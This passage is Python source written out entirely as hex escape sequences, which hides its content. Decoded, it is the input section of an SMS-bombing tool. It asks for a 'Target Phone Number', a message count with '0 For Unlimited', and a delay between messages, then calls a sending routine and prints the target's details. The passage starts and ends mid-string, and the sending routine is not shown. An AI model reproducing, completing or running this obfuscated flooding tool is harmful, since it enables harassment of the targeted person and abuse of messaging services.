20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x52\x65\x74\x75\x72\x6e\x20\x54\x6f\x20\x4d\x61\x69\x6e\x20\x4d\x65\x6e\x75\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6d\x6f\x64\x75\x6c\x65\x20\x3d\x3d\x20\x27\x34\x27\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x0a\x64\x65\x66\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x3a\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x63\x63\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x70\x6e\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x70\x6e\x20\x3d\x20\x22\x22\x0a\x20\x20\x20\x20\x23\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x0a\x20\x20\x20\x20\x74\x72\x20\x3d\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x20\x7b\x30\x7d\x50\x52\x45\x53\x53\x20\x7b\x36\x7d\x22\x7b\x34\x7d\x7b\x30\x7d\x51\x7b\x36\x7d\x22\x7b\x34\x7d\x20\x7b\x30\x7d\x52\x45\x54\x55\x52\x4e\x20\x54\x4f\x20\x4d\x41\x49\x4e\x20\x4d\x45\x4e\x55\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x63\x63\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x43\x6f\x64\x65\x20\x7b\x35\x7d\x28\x7b\x32\x7d\x57\x69\x74\x68\x6f\x75\x74\x20\x2b\x7b\x35\x7d\x29\x20\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x33\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x63\x63\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x27\x2b\x27\x20\x69\x6e\x20\x63\x63\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x63\x20\x3d\x20\x6c\x69\x73\x74\x28\x63\x63\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x63\x2e\x72\x65\x6d\x6f\x76\x65\x28\x27\x2b\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x63\x20\x3d\x20\x27\x27\x2e\x6a\x6f\x69\x6e\x28\x74\x63\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x63\x20\x3d\x20\x63\x63\x2e\x73\x74\x72\x69\x70\x28\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6c\x65\x6e\x28\x63\x63\x29\x20\x3e\x3d\x20\x34\x20\x6f\x72\x20\x6c\x65\x6e\x28\x63\x63\x29\x20\x3c\x20\x31\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x7b\x32\x7d\x5b\x7b\x30\x7d\x23\x7b\x32\x7d\x5d\x7b\x30\x7d\x49\x6e\x76\x61\x6c\x69\x64\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x43\x6f\x64\x65\x2e\x2e\x2e\x2e\x5c\x6e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x20\x20\x20\x20\x64\x70\x6e\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x54\x61\x72\x67\x65\x74\x20\x50\x68\x6f\x6e\x65\x20\x4e\x75\x6d\x62\x65\x72\x20\x5c\x74\x5c\x74\x7b\x37\x7d\x7b\x30\x7d\x3a\x7b\x34\x7d\x7b\x35\x7d\x20\x2b\x7b\x33\x7d\x20\x7b\x36\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x63\x63\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x64\x70\x6e\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x70\x6e\x20\x3d\x20\x72\x65\x6d\x73\x70\x28\x64\x70\x6e\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6c\x65\x6e\x28\x70\x6e\x29\x20\x3c\x3d\x20\x36\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x7b\x32\x7d\x5b\x7b\x30\x7d\x23\x7b\x32\x7d\x5d\x7b\x30\x7d\x49\x6e\x76\x61\x6c\x69\x64\x20\x50\x68\x6f\x6e\x65\x20\x4e\x75\x6d\x62\x65\x72\x2e\x2e\x2e\x2e\x5c\x6e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x66\x6f\x72\x20\x63\x63\x68\x20\x69\x6e\x20\x73\x74\x72\x28\x63\x63\x20\x2b\x20\x70\x6e\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x6e\x6f\x74\x20\x63\x63\x68\x2e\x69\x73\x64\x69\x67\x69\x74\x28\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x7b\x32\x7d\x5b\x7b\x30\x7d\x23\x7b\x32\x7d\x5d\x7b\x30\x7d\x50\x68\x6f\x6e\x65\x20\x4e\x75\x6d\x62\x65\x72\x20\x4d\x75\x73\x74\x20\x43\x6f\x6e\x73\x69\x73\x74\x20\x4f\x66\x20\x4e\x75\x6d\x62\x65\x72\x73\x20\x4f\x6e\x6c\x79\x5c\x6e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x64\x65\x66\x20\x6e\x6f\x5f\x73\x6d\x73\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x69\x66\x20\x63\x63\x20\x3d\x3d\x20\x22\x39\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x4e\x6f\x2e\x6f\x66\x20\x4d\x65\x73\x73\x61\x67\x65\x73\x20\x54\x6f\x20\x53\x65\x6e\x64\x7b\x35\x7d\x28\x7b\x33\x7d\x30\x20\x46\x6f\x72\x20\x55\x6e\x6c\x69\x6d\x69\x74\x65\x64\x7b\x35\x7d\x29\x20\x20\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x66\x6c\x6f\x61\x74\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x46\x6f\x72\x20\x4d\x65\x73\x73\x61\x67\x65\x7b\x35\x7d\x28\x7b\x30\x7d\x69\x6e\x20\x73\x65\x63\x6f\x6e\x64\x73\x7b\x35\x7d\x29\x20\x7b\x33\x7d\x5b\x7b\x32\x7d\x52\x65\x63\x6f\x6d\x6d\x65\x6e\x64\x65\x64\x20\x32\x20\x73\x65\x63\x7b\x33\x7d\x5d\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x64\x6c\x20\x3c\x20\x32\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70\x74\x20\x43\x61\x6e\x27\x74\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4c\x65\x73\x73\x20\x54\x68\x65\x6e\x20\x32\x20\x53\x65\x63\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x32\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x4e\x6f\x2e\x6f\x66\x20\x4d\x65\x73\x73\x61\x67\x65\x73\x20\x54\x6f\x20\x53\x65\x6e\x64\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x66\x6c\x6f\x61\x74\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x46\x6f\x72\x20\x4d\x65\x73\x73\x61\x67\x65\x7b\x35\x7d\x28\x7b\x30\x7d\x69\x6e\x20\x73\x65\x63\x6f\x6e\x64\x73\x7b\x35\x7d\x29\x20\x7b\x33\x7d\x5b\x7b\x32\x7d\x52\x65\x63\x6f\x6d\x6d\x65\x6e\x64\x65\x64\x20\x35\x20\x73\x65\x63\x7b\x33\x7d\x5d\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x64\x6c\x20\x3c\x20\x35\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70\x74\x20\x43\x61\x6e\x27\x74\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4c\x65\x73\x73\x20\x54\x68\x65\x6e\x20\x35\x20\x53\x65\x63\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x35\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x73\x6d\x73\x5f\x77\x6f\x72\x6b\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x30\x7d\x5b\x7b\x35\x7d\x54\x41\x52\x47\x45\x54\x20\x44\x45\x54\x41\x49\x4c\x53\x7b\x30\x7d\x5d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x54\x61\x72\x67\x65\x74\x20\x4e\x75\x6d\x62\x65\x72\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x38\x7d\x3a\x7b\x34\x7d\x7b\x35\x7d\x20\x2b\x7b\x33\x7d\x7b\x36\x7d\x20\x7b\x37\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x73\x74\x72\x28\x63\x63\x29\x2c\x70\x6e\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x4e\x75\x6d\x62\x65\x72\x20\x6f\x66\x20\x4d\x65\x73\x73\x61\x67\x65\x20\x54\x6f\x20\x53\x65\x6e\x74\x20\x7b\x30\x7d\x7b\x37\x7d\x3a\x7b\x34\x7d\x20\x7b\x33\x7d\x7b\x36\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\